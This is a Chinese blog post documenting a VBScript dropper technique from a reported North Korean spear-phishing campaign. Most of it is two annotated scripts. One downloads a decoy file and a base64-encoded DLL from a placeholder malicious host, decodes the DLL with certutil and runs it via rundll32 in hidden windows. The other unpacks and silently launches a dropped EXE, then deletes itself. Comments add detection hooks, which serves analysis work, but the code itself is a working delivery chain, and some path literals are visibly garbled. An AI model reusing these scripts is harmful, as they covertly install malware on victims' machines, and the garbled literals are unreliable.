  • 利用VBS下载EXE文件手法记录

    1、信息来源

    疑似朝鲜通过鱼叉攻击韩国统一部记者的APT事件整理

    https://mp.weixin.qq.com/s/4IFV31MBNbANnCVaJj7ZPQ

    https://twitter.com/blackorbird/status/1082553543280680962

    2、利用思路

    1、 下载 http://恶意网址/note[.]png 保存到 %TEMP% 目录下，并通过【powershell Invoke-Item】用系统默认关联程序打开（从流程上看应为诱饵文件，用于掩盖后续动作）。
    2、 下载 http://恶意网址/svchow[.]dat（base64 编码后的载荷）并保存到 %TEMP% 目录下。
    3、 使用 certutil -f -decode 对其做 base64 解码（-f 表示强制覆盖已存在的输出文件），输出为 svchow[.]dll。
    4、 通过 powershell 调用 rundll32 加载 svchow[.]dll，并执行其导出函数 MyRTLCreateFunction，从而运行恶意代码。整个进程链为 wscript.exe → powershell.exe → certutil.exe / cmd.exe → rundll32.exe，可作为检测依据。

    3、实例代码

    下载代码:

    ' Dropper excerpt as documented in the referenced APT write-up (kept for analysis
    ' and detection engineering only). Flow: fetch a decoy file and a base64-encoded
    ' DLL over plain HTTP into %TEMP%, decode the DLL with certutil, then load it
    ' through rundll32 -- every stage is launched via WScript.Shell.Run.
    ' NOTE(review): the page renderer appears to have eaten backslashes inside the
    ' string literals ("\n" became a line break, other "\" simply vanished); the code
    ' below is left byte-for-byte as published, so treat the paths as approximate.
    Set wshShell = CreateObject("Wscript.shell")
    dir = wshShell.ExpandEnvironmentStrings("%TEMP%")   ' drop directory; note: no trailing separator
    docUrl = "http://恶意网址/note.png"                   ' decoy download URL (placeholder host)
    dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")   ' MSXML HTTP client used for the GET
    dim bStrm: Set bStrm = createobject("Adodb.Stream")        ' ADODB.Stream writes the raw bytes to disk
    xHttp.Open "GET", docUrl, False   ' third argument False = synchronous request
    xHttp.Send
    ' The next two lines were one statement in the original (docPath = dir + "\note.png");
    ' the "\n" escape in the literal was rendered as a line break by the page.
    docPath = dir + "
    ote.png"
    with bStrm
    	.type = 1 '// 1 = adTypeBinary: write bytes, not text
    	.open
    	.write xHttp.responseBody
    	.savetofile docPath, 2 '// 2 = adSaveCreateOverWrite
    end With
    
    ' Open the decoy with its default handler via PowerShell Invoke-Item.
    ' Run(..., 0, true): window style 0 = hidden, true = wait for the process to exit.
    ' Same "\n" garbling as above inside the string literal.
    CreateObject("Wscript.shell").Run "powershell Invoke-item '" + dir + "
    ote.png'", 0, true
    
    docUrl = "http://恶意网址/svchow.dat"   ' second payload: the base64-encoded DLL
    dim xHttp2: Set xHttp2 = createobject("Microsoft.XMLHTTP")
    dim bStrm2: Set bStrm2 = createobject("Adodb.Stream")
    xHttp2.Open "GET", docUrl, False   ' synchronous GET, as above
    xHttp2.Send
    
    with bStrm2
    	.type = 1 '// 1 = adTypeBinary
    	.open
    	.write xHttp2.responseBody
    	.savetofile dir + "svchow.dat", 2 '// 2 = overwrite; the "\" before svchow.dat was presumably lost by the renderer
    end With
    ' certutil -f -decode <in> <out>: base64-decode svchow.dat into svchow.dll (-f overwrites an
    ' existing output). The comma between the two paths makes PowerShell parse them as an array,
    ' which it then appears to pass to certutil as two separate arguments. Detection hook:
    ' certutil.exe with -decode spawned from powershell.exe, writing a DLL into %TEMP%.
    CreateObject("Wscript.shell").Run "powershell -windowstyle hidden certutil -f -decode " & dir & "svchow.dat, " & dir & "svchow.dll",0,true
    ' Load the decoded DLL from %TEMP% and call its export MyRTLCreateFunction.
    ' Detection hook: rundll32.exe with a %TEMP% DLL and an unusual export name, parent cmd.exe/powershell.exe.
    CreateObject("Wscript.shell").Run "powershell -windowstyle hidden cmd /c rundll32 " & dir & "svchow.dll,MyRTLCreateFunction",0,true
    
    
    

    转码（去掉文件头部 FF FE 两字节前缀后）运行 exe:

    ' Loader excerpt: strip a 2-byte prefix from a dropped EXE, launch it hidden, then delete
    ' the running script. Kept verbatim for analysis; see the notes on the garbled literals.
    ' NOTE(review): backslashes in the two path literals were stripped by the page renderer and
    ' the "\t" escape became a literal tab; the original was presumably "C:\windows\temp\xxx.exe".
    Dim fIn, fOut, sFilename, sBOM
    sFilename = "C:windows	empxxx.exe"
    
    Set fIn = CreateObject("adodb.stream")
    fIn.Type = 1 'adTypeBinary
    ' adModeRead is an ADO type-library constant and is not declared anywhere in this script
    ' (no Const line); in a plain .vbs it is just an undefined, Empty variable, so this
    ' assignment may not set the mode the author intended -- verify before using for emulation.
    fIn.Mode = adModeRead
    fIn.Open
    fIn.LoadFromFile sFilename
    
    sBOM = fIn.Read(5)   ' read the first 5 bytes; only bytes 1 and 2 are inspected below
    ' The published comment referred to the UTF-8 BOM (EF BB BF), but the check actually tests
    ' for 0xFF 0xFE (decimal 255, 254), i.e. the UTF-16LE BOM: the dropped file is expected
    ' to carry a 2-byte FF FE prefix in front of the MZ header, which the code removes below.
    If AscB(MidB(sBOM, 1, 1)) = 255 _
            And AscB(MidB(sBOM, 2, 1)) = 254 Then
        
        fIn.Position = 2 ' Skip the 2-byte prefix; everything after it is copied out
    
        Set fOut = CreateObject("adodb.stream")
        fOut.Type = 1 'adTypeBinary
        fOut.Mode = adModeReadWrite   ' also an undeclared ADO constant here (see note on adModeRead)
        fOut.Open
    
        fIn.CopyTo fOut   ' copies from the current Position (2) to end of stream
    
        fOut.SaveToFile sFilename, 2 'adSaveCreateOverWrite: rewrite the file in place without the prefix
        fOut.Flush
        fOut.Close
    
    	' Launch the now-valid PE: window style 0 = hidden, False = do not wait for it to exit.
    	Set shell = CreateObject("Wscript.Shell")
    	shell.Run "c:windows	empxxx.exe",0,False
    	
    	' Self-delete. WScript.ScriptName is the bare file name (no path), so the delete resolves
    	' against the current working directory, not necessarily the script's own directory
    	' (WScript.ScriptFullName would). Forensics: the script may therefore survive on disk.
    	Set fso = CreateObject("Scripting.FileSystemObject") 
    	fso.DeleteFile(WScript.ScriptName) 
    End If
    
  • 原文地址:https://www.cnblogs.com/17bdw/p/10181580.html